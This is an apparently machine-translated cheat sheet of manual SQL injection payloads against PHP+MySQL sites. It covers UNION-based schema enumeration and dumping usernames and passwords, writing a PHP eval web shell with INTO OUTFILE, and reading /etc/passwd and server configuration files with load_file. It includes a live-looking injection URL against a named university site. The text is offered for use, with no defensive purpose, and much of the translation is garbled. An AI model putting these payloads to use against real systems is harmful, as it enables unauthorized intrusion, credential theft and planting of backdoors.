PHP+MySQL manual injection statement daquan recommended
- 2020-03-31 16:46:14
- OfStack
Burst field length
The Order by num / *
Match the field
And 1=1 union select 1,2,3,4,5...... N / *
Burst field location
And 1=2 union select 1,2,3,4,5... . N / *
Explodes database information with built-in functions
Version () database () the user ()
No need to guess the available field database information (some sites do not apply):
And 1=2 union all select version() /*
And 1=2 union all select database() /*
And 1=2 union all select user() /*
Operating system information:
And 1=2 union all select @@global.version_compile_os from mysql.user /*
Database permissions:
And ord(mid(user(),1,1))=114 /*
BaoKu (mysql> 5.0)
Mysql 5 + has a built-in library, information_schema, that stores all database and table structure information for Mysql
And 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.schemata limit 0,1
Guess the table
And 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA= database (hexadecimal) limit 0,1 (display 1 record) --
Guess field
COLUMN_NAME,5,6,7,8,9,10 from information_schema.columns where TABLE_NAME= table name (hexadecimal) limit 0,1
Suddenly and violently password
And 1=2 Union select 1,2,3, username segment,5,6,7, password segment,8,9 from table name limit 0,1
Advanced usage (one available field displays two data contents) :
Union select 1,2,3concat(username segment,0x3c, password segment),5,6,7,8,9 from table name limit 0,1
Write directly to the horse (Root)
Condition: 1. Know the physical path of the site
2. Have sufficient permissions (select... .from mysql.user test)
3, magic_quotes_gpc () = OFF
Select '< ? PHP eval ($_POST [CMD])? > ' Into outfile 'physical path'
And 1=2 union all select HEX into outfile 'path'
Load_file () common path:
1, the replace (the load_file (0 x 2 f6574632f706173737764), 0 x 3 c, 0 x 20)
2, the replace (the load_file (char (47101116,99,47,112,97,115,115,119,100)), the char (60), char (32))
The above two are to see the full display code in a PHP file. Replacement with "space" returns a web page. The code cannot be viewed.
3, load_file(char(47)) can list FreeBSD,Sunos system root directory
4, /etc tpd-conf tpd.conf or /usr/local/apche/conf tpd.conf view the Linux APACHE virtual host configuration file
5, c:\Program Files\Apache Group\Apache\conf \httpd.conf or c:\ Apache\conf \httpd.conf view WINDOWS Apache Files
6, c: / Resin - 3.0.14 / conf/Resin conf View JSP development site resin file configuration information.
7, c: / Resin/conf/Resin conf / usr/local/resin/conf/resin. The conf view JSP virtual host Linux system configuration
8, d: \ APACHE \ Apache2 \ conf \ HTTPD. Conf
9, C: \ Program Files \ mysql \ my ini
10,.. /themes/darkblue_orange/layout. Inc. PHP phpmyadmin has exploded
11, c:\ Windows \system32\inetsrv\ metabase.xml view the virtual host configuration file for IIS
12. /usr/local/resin-3.0.22/conf/resin. Conf view the resin configuration file of 3.0.22
13. /usr/local/resin-pro-3.0.22/conf/resin. Conf, ibid
14, / usr/local/app/apache2 / conf/extra TPD - vhosts. Conf APASHE virtual host view
15. /etc/sysconfig/iptables
16, usr/local/app/php5 b/php.ini PHP equivalent Settings
17. /etc/my.cnf MYSQL configuration file
18, / etc/redhat - release The system version of red hat
19, C:\mysql\data\mysql\user.MYD exists in the mysql system user password
20, /etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21. /usr/local/app/php5 b/php.ini //PHP
22, / usr/local/app/apache2 / conf/extra TPD - vhosts. Conf / / virtual site Settings
23, C: \ \ Program Files\RhinoSoft.com Serv -u \ ServUDaemon ini
24, c: \ Windows \ my ini
25, c: \ boot. Ini
Config. Inc. PHP, config. PHP. Replace (load_file(HEX),char(60),char(32))
Note:
Char (60) said <
Char (32) represents a space
Problems with manual injection:
After injection, the page displays:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Such as: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 20 and 13% % % % 201 = 2% 20 union select 20, 201, the load_file (0 x433a5c626f6f742e696e69), 3, 4, the user % 20 ()
This is due to inconsistent coding,
Solution: just add unhex before the parameter. The URL above can be changed to:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 20 and 13% % % % 201 = 2% 20 union select 20 201, unhex (hex (the load_file (0 x433a5c626f6f742e696e69))), 3, 4, unhex (hex (user ())) % 20
You can continue to inject...